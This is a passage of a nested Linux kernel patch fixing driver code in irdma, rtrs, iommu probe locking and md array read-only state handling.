+-			status = irdma_sc_cceq_create(&iwceq->sc_ceq, scratch);
++			status = irdma_sc_cceq_create(&iwceq->sc_ceq, 0);
+ 	}
+ 
+ 	if (status) {
+@@ -1740,7 +1749,7 @@ void irdma_ctrl_deinit_hw(struct irdma_pci_f *rf)
+ 				      rf->reset, rf->rdma_ver);
+ 		fallthrough;
+ 	case CQP_CREATED:
+-		irdma_destroy_cqp(rf, true);
++		irdma_destroy_cqp(rf);
+ 		fallthrough;
+ 	case INITIAL_STATE:
+ 		irdma_del_init_mem(rf);
+diff --git a/drivers/infiniband/hw/irdma/main.c b/drivers/infiniband/hw/irdma/main.c
+index 514453777e07d..be1030d1adfaf 100644
+--- a/drivers/infiniband/hw/irdma/main.c
++++ b/drivers/infiniband/hw/irdma/main.c
+@@ -48,7 +48,7 @@ static void irdma_prep_tc_change(struct irdma_device *iwdev)
+ 	/* Wait for all qp's to suspend */
+ 	wait_event_timeout(iwdev->suspend_wq,
+ 			   !atomic_read(&iwdev->vsi.qp_suspend_reqs),
+-			   IRDMA_EVENT_TIMEOUT);
++			   msecs_to_jiffies(IRDMA_EVENT_TIMEOUT_MS));
+ 	irdma_ws_reset(&iwdev->vsi);
+ }
+ 
+diff --git a/drivers/infiniband/hw/irdma/main.h b/drivers/infiniband/hw/irdma/main.h
+index 9cbe64311f985..6a6b14d8fca45 100644
+--- a/drivers/infiniband/hw/irdma/main.h
++++ b/drivers/infiniband/hw/irdma/main.h
+@@ -78,7 +78,7 @@ extern struct auxiliary_driver i40iw_auxiliary_drv;
+ 
+ #define MAX_DPC_ITERATIONS	128
+ 
+-#define IRDMA_EVENT_TIMEOUT		50000
++#define IRDMA_EVENT_TIMEOUT_MS		5000
+ #define IRDMA_VCHNL_EVENT_TIMEOUT	100000
+ #define IRDMA_RST_TIMEOUT_HZ		4
+ 
+diff --git a/drivers/infiniband/hw/irdma/verbs.c b/drivers/infiniband/hw/irdma/verbs.c
+index 3b8b2341981ea..447e1bcc82a32 100644
+--- a/drivers/infiniband/hw/irdma/verbs.c
++++ b/drivers/infiniband/hw/irdma/verbs.c
+@@ -1098,6 +1098,21 @@ static int irdma_query_pkey(struct ib_device *ibdev, u32 port, u16 index,
+ 	return 0;
+ }
+ 
++static int irdma_wait_for_suspend(struct irdma_qp *iwqp)
++{
++	if (!wait_event_timeout(iwqp->iwdev->suspend_wq,
++				!iwqp->suspend_pending,
++				msecs_to_jiffies(IRDMA_EVENT_TIMEOUT_MS))) {
++		iwqp->suspend_pending = false;
++		ibdev_warn(&iwqp->iwdev->ibdev,
++			   "modify_qp timed out waiting for suspend. qp_id = %d, last_ae = 0x%x\n",
++			   iwqp->ibqp.qp_num, iwqp->last_aeq);
++		return -EBUSY;
++	}
++
++	return 0;
++}
++
+ /**
+  * irdma_modify_qp_roce - modify qp request
+  * @ibqp: qp's pointer for modify
+@@ -1359,17 +1374,11 @@ int irdma_modify_qp_roce(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+ 
+ 			info.next_iwarp_state = IRDMA_QP_STATE_SQD;
+ 			issue_modify_qp = 1;
++			iwqp->suspend_pending = true;
+ 			break;
+ 		case IB_QPS_SQE:
+ 		case IB_QPS_ERR:
+ 		case IB_QPS_RESET:
+-			if (iwqp->iwarp_state == IRDMA_QP_STATE_RTS) {
+-				spin_unlock_irqrestore(&iwqp->lock, flags);
+-				info.next_iwarp_state = IRDMA_QP_STATE_SQD;
+-				irdma_hw_modify_qp(iwdev, iwqp, &info, true);
+-				spin_lock_irqsave(&iwqp->lock, flags);
+-			}
+-
+ 			if (iwqp->iwarp_state == IRDMA_QP_STATE_ERROR) {
+ 				spin_unlock_irqrestore(&iwqp->lock, flags);
+ 				if (udata && udata->inlen) {
+@@ -1406,6 +1415,11 @@ int irdma_modify_qp_roce(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+ 			ctx_info->rem_endpoint_idx = udp_info->arp_idx;
+ 			if (irdma_hw_modify_qp(iwdev, iwqp, &info, true))
+ 				return -EINVAL;
++			if (info.next_iwarp_state == IRDMA_QP_STATE_SQD) {
++				ret = irdma_wait_for_suspend(iwqp);
++				if (ret)
++					return ret;
++			}
+ 			spin_lock_irqsave(&iwqp->lock, flags);
+ 			if (iwqp->iwarp_state == info.curr_iwarp_state) {
+ 				iwqp->iwarp_state = info.next_iwarp_state;
+diff --git a/drivers/infiniband/hw/irdma/verbs.h b/drivers/infiniband/hw/irdma/verbs.h
+index a536e9fa85ebf..9f9e273bbff3e 100644
+--- a/drivers/infiniband/hw/irdma/verbs.h
++++ b/drivers/infiniband/hw/irdma/verbs.h
+@@ -193,6 +193,7 @@ struct irdma_qp {
+ 	u8 flush_issued : 1;
+ 	u8 sig_all : 1;
+ 	u8 pau_mode : 1;
++	u8 suspend_pending : 1;
+ 	u8 rsvd : 1;
+ 	u8 iwarp_state;
+ 	u16 term_sq_flush_code;
+diff --git a/drivers/infiniband/ulp/rtrs/rtrs-clt.c b/drivers/infiniband/ulp/rtrs/rtrs-clt.c
+index a67f58359de9e..cc07c91f9c549 100644
+--- a/drivers/infiniband/ulp/rtrs/rtrs-clt.c
++++ b/drivers/infiniband/ulp/rtrs/rtrs-clt.c
+@@ -382,7 +382,7 @@ static void complete_rdma_req(struct rtrs_clt_io_req *req, int errno,
+ 	struct rtrs_clt_path *clt_path;
+ 	int err;
+ 
+-	if (WARN_ON(!req->in_use))
++	if (!req->in_use)
+ 		return;
+ 	if (WARN_ON(!req->con))
+ 		return;
+@@ -1694,7 +1694,7 @@ static int create_con_cq_qp(struct rtrs_clt_con *con)
+ 		clt_path->s.dev_ref++;
+ 		max_send_wr = min_t(int, wr_limit,
+ 			      /* QD * (REQ + RSP + FR REGS or INVS) + drain */
+-			      clt_path->queue_depth * 3 + 1);
++			      clt_path->queue_depth * 4 + 1);
+ 		max_recv_wr = min_t(int, wr_limit,
+ 			      clt_path->queue_depth * 3 + 1);
+ 		max_send_sge = 2;
+@@ -2346,8 +2346,6 @@ static int init_conns(struct rtrs_clt_path *clt_path)
+ 	if (err)
+ 		goto destroy;
+ 
+-	rtrs_start_hb(&clt_path->s);
+-
+ 	return 0;
+ 
+ destroy:
+@@ -2621,6 +2619,7 @@ static int init_path(struct rtrs_clt_path *clt_path)
+ 		goto out;
+ 	}
+ 	rtrs_clt_path_up(clt_path);
++	rtrs_start_hb(&clt_path->s);
+ out:
+ 	mutex_unlock(&clt_path->init_mutex);
+ 
+diff --git a/drivers/infiniband/ulp/rtrs/rtrs-srv.c b/drivers/infiniband/ulp/rtrs/rtrs-srv.c
+index 22d7ba05e9fe8..e978ee4bb73ae 100644
+--- a/drivers/infiniband/ulp/rtrs/rtrs-srv.c
++++ b/drivers/infiniband/ulp/rtrs/rtrs-srv.c
+@@ -63,8 +63,9 @@ static bool rtrs_srv_change_state(struct rtrs_srv_path *srv_path,
+ {
+ 	enum rtrs_srv_state old_state;
+ 	bool changed = false;
++	unsigned long flags;
+ 
+-	spin_lock_irq(&srv_path->state_lock);
++	spin_lock_irqsave(&srv_path->state_lock, flags);
+ 	old_state = srv_path->state;
+ 	switch (new_state) {
+ 	case RTRS_SRV_CONNECTED:
+@@ -85,7 +86,7 @@ static bool rtrs_srv_change_state(struct rtrs_srv_path *srv_path,
+ 	}
+ 	if (changed)
+ 		srv_path->state = new_state;
+-	spin_unlock_irq(&srv_path->state_lock);
++	spin_unlock_irqrestore(&srv_path->state_lock, flags);
+ 
+ 	return changed;
+ }
+@@ -548,7 +549,10 @@ static void unmap_cont_bufs(struct rtrs_srv_path *srv_path)
+ 		struct rtrs_srv_mr *srv_mr;
+ 
+ 		srv_mr = &srv_path->mrs[i];
+-		rtrs_iu_free(srv_mr->iu, srv_path->s.dev->ib_dev, 1);
++
++		if (always_invalidate)
++			rtrs_iu_free(srv_mr->iu, srv_path->s.dev->ib_dev, 1);
++
+ 		ib_dereg_mr(srv_mr->mr);
+ 		ib_dma_unmap_sg(srv_path->s.dev->ib_dev, srv_mr->sgt.sgl,
+ 				srv_mr->sgt.nents, DMA_BIDIRECTIONAL);
+@@ -714,20 +718,23 @@ static void rtrs_srv_info_rsp_done(struct ib_cq *cq, struct ib_wc *wc)
+ 	WARN_ON(wc->opcode != IB_WC_SEND);
+ }
+ 
+-static void rtrs_srv_path_up(struct rtrs_srv_path *srv_path)
++static int rtrs_srv_path_up(struct rtrs_srv_path *srv_path)
+ {
+ 	struct rtrs_srv_sess *srv = srv_path->srv;
+ 	struct rtrs_srv_ctx *ctx = srv->ctx;
+-	int up;
++	int up, ret = 0;
+ 
+ 	mutex_lock(&srv->paths_ev_mutex);
+ 	up = ++srv->paths_up;
+ 	if (up == 1)
+-		ctx->ops.link_ev(srv, RTRS_SRV_LINK_EV_CONNECTED, NULL);
++		ret = ctx->ops.link_ev(srv, RTRS_SRV_LINK_EV_CONNECTED, NULL);
+ 	mutex_unlock(&srv->paths_ev_mutex);
+ 
+ 	/* Mark session as established */
+-	srv_path->established = true;
++	if (!ret)
++		srv_path->established = true;
++
++	return ret;
+ }
+ 
+ static void rtrs_srv_path_down(struct rtrs_srv_path *srv_path)
+@@ -856,7 +863,12 @@ static int process_info_req(struct rtrs_srv_con *con,
+ 		goto iu_free;
+ 	kobject_get(&srv_path->kobj);
+ 	get_device(&srv_path->srv->dev);
+-	rtrs_srv_change_state(srv_path, RTRS_SRV_CONNECTED);
++	err = rtrs_srv_change_state(srv_path, RTRS_SRV_CONNECTED);
++	if (!err) {
++		rtrs_err(s, "rtrs_srv_change_state(), err: %d\n", err);
++		goto iu_free;
++	}
++
+ 	rtrs_srv_start_hb(srv_path);
+ 
+ 	/*
+@@ -865,7 +877,11 @@ static int process_info_req(struct rtrs_srv_con *con,
+ 	 * all connections are successfully established.  Thus, simply notify
+ 	 * listener with a proper event if we are the first path.
+ 	 */
+-	rtrs_srv_path_up(srv_path);
++	err = rtrs_srv_path_up(srv_path);
++	if (err) {
++		rtrs_err(s, "rtrs_srv_path_up(), err: %d\n", err);
++		goto iu_free;
++	}
+ 
+ 	ib_dma_sync_single_for_device(srv_path->s.dev->ib_dev,
+ 				      tx_iu->dma_addr,
+@@ -1521,7 +1537,6 @@ static void rtrs_srv_close_work(struct work_struct *work)
+ 
+ 	srv_path = container_of(work, typeof(*srv_path), close_work);
+ 
+-	rtrs_srv_destroy_path_files(srv_path);
+ 	rtrs_srv_stop_hb(srv_path);
+ 
+ 	for (i = 0; i < srv_path->s.con_num; i++) {
+@@ -1541,6 +1556,8 @@ static void rtrs_srv_close_work(struct work_struct *work)
+ 	/* Wait for all completion */
+ 	wait_for_completion(&srv_path->complete_done);
+ 
++	rtrs_srv_destroy_path_files(srv_path);
++
+ 	/* Notify upper layer if we are the last path */
+ 	rtrs_srv_path_down(srv_path);
+ 
+diff --git a/drivers/iommu/iommu.c b/drivers/iommu/iommu.c
+index 2bcd1f23d07d2..8b38972394776 100644
+--- a/drivers/iommu/iommu.c
++++ b/drivers/iommu/iommu.c
+@@ -278,12 +278,13 @@ static void dev_iommu_free(struct device *dev)
+ 	kfree(param);
+ }
+ 
++DEFINE_MUTEX(iommu_probe_device_lock);
++
+ static int __iommu_probe_device(struct device *dev, struct list_head *group_list)
+ {
+ 	const struct iommu_ops *ops = dev->bus->iommu_ops;
+ 	struct iommu_device *iommu_dev;
+ 	struct iommu_group *group;
+-	static DEFINE_MUTEX(iommu_probe_device_lock);
+ 	int ret;
+ 
+ 	if (!ops)
+@@ -295,11 +296,9 @@ static int __iommu_probe_device(struct device *dev, struct list_head *group_list
+ 	 * probably be able to use device_lock() here to minimise the scope,
+ 	 * but for now enforcing a simple global ordering is fine.
+ 	 */
+-	mutex_lock(&iommu_probe_device_lock);
+-	if (!dev_iommu_get(dev)) {
+-		ret = -ENOMEM;
+-		goto err_unlock;
+-	}
++	lockdep_assert_held(&iommu_probe_device_lock);
++	if (!dev_iommu_get(dev))
++		return -ENOMEM;
+ 
+ 	if (!try_module_get(ops->owner)) {
+ 		ret = -EINVAL;
+@@ -326,7 +325,6 @@ static int __iommu_probe_device(struct device *dev, struct list_head *group_list
+ 	mutex_unlock(&group->mutex);
+ 	iommu_group_put(group);
+ 
+-	mutex_unlock(&iommu_probe_device_lock);
+ 	iommu_device_link(iommu_dev, dev);
+ 
+ 	return 0;
+@@ -341,9 +339,6 @@ out_module_put:
+ err_free:
+ 	dev_iommu_free(dev);
+ 
+-err_unlock:
+-	mutex_unlock(&iommu_probe_device_lock);
+-
+ 	return ret;
+ }
+ 
+@@ -353,7 +348,9 @@ int iommu_probe_device(struct device *dev)
+ 	struct iommu_group *group;
+ 	int ret;
+ 
++	mutex_lock(&iommu_probe_device_lock);
+ 	ret = __iommu_probe_device(dev, NULL);
++	mutex_unlock(&iommu_probe_device_lock);
+ 	if (ret)
+ 		goto err_out;
+ 
+@@ -1684,7 +1681,9 @@ static int probe_iommu_group(struct device *dev, void *data)
+ 		return 0;
+ 	}
+ 
++	mutex_lock(&iommu_probe_device_lock);
+ 	ret = __iommu_probe_device(dev, group_list);
++	mutex_unlock(&iommu_probe_device_lock);
+ 	if (ret == -ENODEV)
+ 		ret = 0;
+ 
+diff --git a/drivers/iommu/of_iommu.c b/drivers/iommu/of_iommu.c
+index 5696314ae69e7..1fa1db3be8529 100644
+--- a/drivers/iommu/of_iommu.c
++++ b/drivers/iommu/of_iommu.c
+@@ -112,16 +112,20 @@ const struct iommu_ops *of_iommu_configure(struct device *dev,
+ 					   const u32 *id)
+ {
+ 	const struct iommu_ops *ops = NULL;
+-	struct iommu_fwspec *fwspec = dev_iommu_fwspec_get(dev);
++	struct iommu_fwspec *fwspec;
+ 	int err = NO_IOMMU;
+ 
+ 	if (!master_np)
+ 		return NULL;
+ 
++	/* Serialise to make dev->iommu stable under our potential fwspec */
++	mutex_lock(&iommu_probe_device_lock);
++	fwspec = dev_iommu_fwspec_get(dev);
+ 	if (fwspec) {
+-		if (fwspec->ops)
++		if (fwspec->ops) {
++			mutex_unlock(&iommu_probe_device_lock);
+ 			return fwspec->ops;
+-
++		}
+ 		/* In the deferred case, start again from scratch */
+ 		iommu_fwspec_free(dev);
+ 	}
+@@ -155,6 +159,8 @@ const struct iommu_ops *of_iommu_configure(struct device *dev,
+ 		fwspec = dev_iommu_fwspec_get(dev);
+ 		ops    = fwspec->ops;
+ 	}
++	mutex_unlock(&iommu_probe_device_lock);
++
+ 	/*
+ 	 * If we have reason to believe the IOMMU driver missed the initial
+ 	 * probe for dev, replay it to get things in order.
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 20f67edae95d0..0c2801d770901 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -93,6 +93,18 @@ static int remove_and_add_spares(struct mddev *mddev,
+ 				 struct md_rdev *this);
+ static void mddev_detach(struct mddev *mddev);
+ 
++enum md_ro_state {
++	MD_RDWR,
++	MD_RDONLY,
++	MD_AUTO_READ,
++	MD_MAX_STATE
++};
++
++static bool md_is_rdwr(struct mddev *mddev)
++{
++	return (mddev->ro == MD_RDWR);
++}
++
+ /*
+  * Default number of read corrections we'll attempt on an rdev
+  * before ejecting it from the array. We divide the read error
+@@ -444,7 +456,7 @@ static void md_submit_bio(struct bio *bio)
+ 	if (!bio)
+ 		return;
+ 
+-	if (mddev->ro == 1 && unlikely(rw == WRITE)) {
++	if (mddev->ro == MD_RDONLY && unlikely(rw == WRITE)) {
+ 		if (bio_sectors(bio) != 0)
+ 			bio->bi_status = BLK_STS_IOERR;
+ 		bio_endio(bio);
+@@ -2643,7 +2655,7 @@ void md_update_sb(struct mddev *mddev, int force_change)
+ 	int any_badblocks_changed = 0;
+ 	int ret = -1;
+ 
+-	if (mddev->ro) {
++	if (!md_is_rdwr(mddev)) {
+ 		if (force_change)
+ 			set_bit(MD_SB_CHANGE_DEVS, &mddev->sb_flags);
+ 		return;
+@@ -3909,7 +3921,7 @@ level_store(struct mddev *mddev, const char *buf, size_t len)
+ 		goto out_unlock;
+ 	}
+ 	rv = -EROFS;
+-	if (mddev->ro)
++	if (!md_is_rdwr(mddev))
+ 		goto out_unlock;
+ 
+ 	/* request to change the personality.  Need to ensure:
+@@ -4115,7 +4127,7 @@ layout_store(struct mddev *mddev, const char *buf, size_t len)
+ 	if (mddev->pers) {
+ 		if (mddev->pers->check_reshape == NULL)
+ 			err = -EBUSY;
+-		else if (mddev->ro)
++		else if (!md_is_rdwr(mddev))
+ 			err = -EROFS;
+ 		else {
+ 			mddev->new_layout = n;
+@@ -4224,7 +4236,7 @@ chunk_size_store(struct mddev *mddev, const char *buf, size_t len)
+ 	if (mddev->pers) {
+ 		if (mddev->pers->check_reshape == NULL)
+ 			err = -EBUSY;
+-		else if (mddev->ro)
++		else if (!md_is_rdwr(mddev))
+ 			err = -EROFS;
+ 		else {
+ 			mddev->new_chunk_sectors = n >> 9;
+@@ -4347,13 +4359,13 @@ array_state_show(struct mddev *mddev, char *page)
+ 
+ 	if (mddev->pers && !test_bit(MD_NOT_READY, &mddev->flags)) {
+ 		switch(mddev->ro) {
+-		case 1:
++		case MD_RDONLY:
+ 			st = readonly;
+ 			break;
+-		case 2:
++		case MD_AUTO_READ:
+ 			st = read_auto;
+ 			break;
+-		case 0:
++		case MD_RDWR:
+ 			spin_lock(&mddev->lock);
+ 			if (test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags))
+ 				st = write_pending;
+@@ -4389,7 +4401,8 @@ array_state_store(struct mddev *mddev, const char *buf, size_t len)
+ 	int err = 0;
+ 	enum array_state st = match_word(buf, array_states);
+ 
+-	if (mddev->pers && (st == active || st == clean) && mddev->ro != 1) {
++	if (mddev->pers && (st == active || st == clean) &&
++	    mddev->ro != MD_RDONLY) {
+ 		/* don't take reconfig_mutex when toggling between
+ 		 * clean and active
+ 		 */
+@@ -4433,23 +4446,23 @@ array_state_store(struct mddev *mddev, const char *buf, size_t len)
+ 		if (mddev->pers)
+ 			err = md_set_readonly(mddev, NULL);
+ 		else {
+-			mddev->ro = 1;
++			mddev->ro = MD_RDONLY;
+ 			set_disk_ro(mddev->gendisk, 1);
+ 			err = do_md_run(mddev);
+ 		}
+ 		break;
+ 	case read_auto:
+ 		if (mddev->pers) {
+-			if (mddev->ro == 0)
++			if (md_is_rdwr(mddev))
+ 				err = md_set_readonly(mddev, NULL);
+-			else if (mddev->ro == 1)
++			else if (mddev->ro == MD_RDONLY)
+ 				err = restart_array(mddev);
+ 			if (err == 0) {
+-				mddev->ro = 2;
++				mddev->ro = MD_AUTO_READ;
+ 				set_disk_ro(mddev->gendisk, 0);
+ 			}
+ 		} else {
+-			mddev->ro = 2;
++			mddev->ro = MD_AUTO_READ;
+ 			err = do_md_run(mddev);
+ 		}
+ 		break;
+@@ -4474,7 +4487,7 @@ array_state_store(struct mddev *mddev, const char *buf, size_t len)
+ 			wake_up(&mddev->sb_wait);
+ 			err = 0;
+ 		} else {
+-			mddev->ro = 0;
++			mddev->ro = MD_RDWR;
+ 			set_disk_ro(mddev->gendisk, 0);
+ 			err = do_md_run(mddev);
+ 		}
+@@ -4775,7 +4788,7 @@ action_show(struct mddev *mddev, char *page)
+ 	if (test_bit(MD_RECOVERY_FROZEN, &recovery))
+ 		type = "frozen";
+ 	else if (test_bit(MD_RECOVERY_RUNNING, &recovery) ||
+-	    (!mddev->ro && test_bit(MD_RECOVERY_NEEDED, &recovery))) {
++	    (md_is_rdwr(mddev) && test_bit(MD_RECOVERY_NEEDED, &recovery))) {
+ 		if (test_bit(MD_RECOVERY_RESHAPE, &recovery))
+ 			type = "reshape";
+ 		else if (test_bit(MD_RECOVERY_SYNC, &recovery)) {
+@@ -4861,11 +4874,11 @@ action_store(struct mddev *mddev, const char *page, size_t len)
+ 		set_bit(MD_RECOVERY_REQUESTED, &mddev->recovery);
+ 		set_bit(MD_RECOVERY_SYNC, &mddev->recovery);
+ 	}
+-	if (mddev->ro == 2) {
++	if (mddev->ro == MD_AUTO_READ) {
+ 		/* A write to sync_action is enough to justify
+ 		 * canceling read-auto mode
+ 		 */
+-		mddev->ro = 0;
++		mddev->ro = MD_RDWR;
+ 		md_wakeup_thread(mddev->sync_thread);
+ 	}
+ 	set_bit(MD_RECOVERY_NEEDED, &mddev->recovery);
+@@ -5093,8 +5106,7 @@ max_sync_store(struct mddev *mddev, const char *buf, size_t len)
+ 			goto out_unlock;
+ 
+ 		err = -EBUSY;
+-		if (max < mddev->resync_max &&
+-		    mddev->ro == 0 &&
++		if (max < mddev->resync_max && md_is_rdwr(mddev) &&
+ 		    test_bit(MD_RECOVERY_RUNNING, &mddev->recovery))
+ 			goto out_unlock;
+ 
+@@ -5829,8 +5841,8 @@ int md_run(struct mddev *mddev)
+ 			continue;
+ 		sync_blockdev(rdev->bdev);
+ 		invalidate_bdev(rdev->bdev);
+-		if (mddev->ro != 1 && rdev_read_only(rdev)) {
+-			mddev->ro = 1;
++		if (mddev->ro != MD_RDONLY && rdev_read_only(rdev)) {
++			mddev->ro = MD_RDONLY;
+ 			if (mddev->gendisk)
+ 				set_disk_ro(mddev->gendisk, 1);
+ 		}
+@@ -5938,8 +5950,8 @@ int md_run(struct mddev *mddev)
+ 
+ 	mddev->ok_start_degraded = start_dirty_degraded;
+ 
+-	if (start_readonly && mddev->ro == 0)
+-		mddev->ro = 2; /* read-only, but switch on first write */
++	if (start_readonly && md_is_rdwr(mddev))
++		mddev->ro = MD_AUTO_READ; /* read-only, but switch on first write */
+ 
+ 	err = pers->run(mddev);
+ 	if (err)
+@@ -6017,8 +6029,8 @@ int md_run(struct mddev *mddev)
+ 		mddev->sysfs_action = sysfs_get_dirent_safe(mddev->kobj.sd, "sync_action");
+ 		mddev->sysfs_completed = sysfs_get_dirent_safe(mddev->kobj.sd, "sync_completed");
+ 		mddev->sysfs_degraded = sysfs_get_dirent_safe(mddev->kobj.sd, "degraded");
+-	} else if (mddev->ro == 2) /* auto-readonly not meaningful */
+-		mddev->ro = 0;
++	} else if (mddev->ro == MD_AUTO_READ)
++		mddev->ro = MD_RDWR;
+ 
+ 	atomic_set(&mddev->max_corr_read_errors,
+ 		   MD_DEFAULT_MAX_CORRECTED_READ_ERRORS);
+@@ -6036,7 +6048,7 @@ int md_run(struct mddev *mddev)
+ 		if (rdev->raid_disk >= 0)
+ 			sysfs_link_rdev(mddev, rdev); /* failure here is OK */
+ 
+-	if (mddev->degraded && !mddev->ro)
++	if (mddev->degraded && md_is_rdwr(mddev))
+ 		/* This ensures that recovering status is reported immediately
+ 		 * via sysfs - until a lack of spares is confirmed.
+ 		 */
+@@ -6128,7 +6140,7 @@ static int restart_array(struct mddev *mddev)
+ 		return -ENXIO;
+ 	if (!mddev->pers)
+ 		return -EINVAL;
+-	if (!mddev->ro)
++	if (md_is_rdwr(mddev))
+ 		return -EBUSY;
+ 
+ 	rcu_read_lock();
+@@ -6147,7 +6159,7 @@ static int restart_array(struct mddev *mddev)
+ 		return -EROFS;
+ 
+ 	mddev->safemode = 0;
+-	mddev->ro = 0;
++	mddev->ro = MD_RDWR;
+ 	set_disk_ro(disk, 0);
+ 	pr_debug("md: %s switched to read-write mode.\n", mdname(mddev));
+ 	/* Kick recovery or resync if necessary */
+@@ -6174,7 +6186,7 @@ static void md_clean(struct mddev *mddev)
+ 	mddev->clevel[0] = 0;
+ 	mddev->flags = 0;
+ 	mddev->sb_flags = 0;
+-	mddev->ro = 0;
++	mddev->ro = MD_RDWR;
+ 	mddev->metadata_type[0] = 0;
+ 	mddev->chunk_sectors = 0;
+ 	mddev->ctime = mddev->utime = 0;
+@@ -6226,7 +6238,7 @@ static void __md_stop_writes(struct mddev *mddev)
+ 	}
+ 	md_bitmap_flush(mddev);
+ 
+-	if (mddev->ro == 0 &&
++	if (md_is_rdwr(mddev) &&
+ 	    ((!mddev->in_sync && !mddev_is_clustered(mddev)) ||
+ 	     mddev->sb_flags)) {
+ 		/* mark array as shutdown cleanly */
+@@ -6302,6 +6314,9 @@ static int md_set_readonly(struct mddev *mddev, struct block_device *bdev)
+ 	int err = 0;
+ 	int did_freeze = 0;
+ 
++	if (mddev->external && test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags))
++		return -EBUSY;
++
+ 	if (!test_bit(MD_RECOVERY_FROZEN, &mddev->recovery)) {
+ 		did_freeze = 1;
+ 		set_bit(MD_RECOVERY_FROZEN, &mddev->recovery);
+@@ -6314,8 +6329,6 @@ static int md_set_readonly(struct mddev *mddev, struct block_device *bdev)
+ 		 * which will now never happen */
+ 		wake_up_process(mddev->sync_thread->tsk);
+ 
+-	if (mddev->external && test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags))
+-		return -EBUSY;
+ 	mddev_unlock(mddev);
+ 	wait_event(resync_wait, !test_bit(MD_RECOVERY_RUNNING,
+ 					  &mddev->recovery));
+@@ -6328,29 +6341,30 @@ static int md_set_readonly(struct mddev *mddev, struct block_device *bdev)
+ 	    mddev->sync_thread ||
+ 	    test_bit(MD_RECOVERY_RUNNING, &mddev->recovery)) {
+ 		pr_warn("md: %s still in use.\n",mdname(mddev));
+-		if (did_freeze) {
+-			clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery);
+-			set_bit(MD_RECOVERY_NEEDED, &mddev->recovery);
+-			md_wakeup_thread(mddev->thread);
+-		}
+ 		err = -EBUSY;
+ 		goto out;
+ 	}
++
+ 	if (mddev->pers) {
+ 		__md_stop_writes(mddev);
+ 
+-		err  = -ENXIO;
+-		if (mddev->ro==1)
++		if (mddev->ro == MD_RDONLY) {
++			err  = -ENXIO;
+ 			goto out;
+-		mddev->ro = 1;
++		}
++
++		mddev->ro = MD_RDONLY;
+ 		set_disk_ro(mddev->gendisk, 1);
++	}
++
++out:
++	if ((mddev->pers && !err) || did_freeze) {
+ 		clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery);
+ 		set_bit(MD_RECOVERY_NEEDED, &mddev->recovery);
+ 		md_wakeup_thread(mddev->thread);
+ 		sysfs_notify_dirent_safe(mddev->sysfs_state);
+-		err = 0;
+ 	}
+-out:
++
+ 	mutex_unlock(&mddev->open_mutex);
+ 	return err;
+ }
+@@ -6399,7 +6413,7 @@ static int do_md_stop(struct mddev *mddev, int mode,
+ 		return -EBUSY;
+ 	}
+ 	if (mddev->pers) {
+-		if (mddev->ro)
++		if (!md_is_rdwr(mddev))
+ 			set_disk_ro(disk, 0);
+ 
+ 		__md_stop_writes(mddev);
+@@ -6416,8 +6430,8 @@ static int do_md_stop(struct mddev *mddev, int mode,
+ 		mutex_unlock(&mddev->open_mutex);
+ 		mddev->changed = 1;
+ 
+-		if (mddev->ro)
+-			mddev->ro = 0;
++		if (!md_is_rdwr(mddev))
++			mddev->ro = MD_RDWR;
+ 	} else
+ 		mutex_unlock(&mddev->open_mutex);
+ 	/*
+@@ -7232,7 +7246,7 @@ static int update_size(struct mddev *mddev, sector_t num_sectors)
+ 	if (test_bit(MD_RECOVERY_RUNNING, &mddev->recovery) ||
+ 	    mddev->sync_thread)
+ 		return -EBUSY;
+-	if (mddev->ro)
++	if (!md_is_rdwr(mddev))
+ 		return -EROFS;
+ 
+ 	rdev_for_each(rdev, mddev) {
+@@ -7262,7 +7276,7 @@ static int update_raid_disks(struct mddev *mddev, int raid_disks)
+ 	/* change the number of raid disks */
+ 	if (mddev->pers->check_reshape == NULL)
+ 		return -EINVAL;
+-	if (mddev->ro)
++	if (!md_is_rdwr(mddev))
+ 		return -EROFS;
+ 	if (raid_disks <= 0 ||
+ 	    (mddev->max_disks && raid_disks >= mddev->max_disks))
+@@ -7686,26 +7700,25 @@ static int md_ioctl(struct block_device *bdev, fmode_t mode,
+ 	 * The remaining ioctls are changing the state of the
+ 	 * superblock, so we do not allow them on read-only arrays.
+ 	 */
+-	if (mddev->ro && mddev->pers) {
+-		if (mddev->ro == 2) {
+-			mddev->ro = 0;
+-			sysfs_notify_dirent_safe(mddev->sysfs_state);
+-			set_bit(MD_RECOVERY_NEEDED, &mddev->recovery);
+-			/* mddev_unlock will wake thread */
+-			/* If a device failed while we were read-only, we
+-			 * need to make sure the metadata is updated now.
+-			 */
+-			if (test_bit(MD_SB_CHANGE_DEVS, &mddev->sb_flags)) {
+-				mddev_unlock(mddev);
+-				wait_event(mddev->sb_wait,
+-					   !test_bit(MD_SB_CHANGE_DEVS, &mddev->sb_flags) &&
+-					   !test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags));
+-				mddev_lock_nointr(mddev);
+-			}
+-		} else {
++	if (!md_is_rdwr(mddev) && mddev->pers) {
++		if (mddev->ro != MD_AUTO_READ) {
+ 			err = -EROFS;
+ 			goto unlock;
+ 		}
++		mddev->ro = MD_RDWR;
++		sysfs_notify_dirent_safe(mddev->sysfs_state);
++		set_bit(MD_RECOVERY_NEEDED, &mddev->recovery);
++		/* mddev_unlock will wake thread */
++		/* If a device failed while we were read-only, we
++		 * need to make sure the metadata is updated now.
++		 */
++		if (test_bit(MD_SB_CHANGE_DEVS, &mddev->sb_flags)) {
++			mddev_unlock(mddev);
++			wait_event(mddev->sb_wait,
++				   !test_bit(MD_SB_CHANGE_DEVS, &mddev->sb_flags) &&
++				   !test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags));
++			mddev_lock_nointr(mddev);
++		}
+ 	}
+ 
+ 	switch (cmd) {
+@@ -7791,11 +7804,11 @@ static int md_set_read_only(struct block_device *bdev, bool ro)
+ 	 * Transitioning to read-auto need only happen for arrays that call
+ 	 * md_write_start and which are not ready for writes yet.
+ 	 */
+-	if (!ro && mddev->ro == 1 && mddev->pers) {
++	if (!ro && mddev->ro == MD_RDONLY && mddev->pers) {
+ 		err = restart_array(mddev);
+ 		if (err)
+ 			goto out_unlock;
+-		mddev->ro = 2;
++		mddev->ro = MD_AUTO_READ;
+ 	}
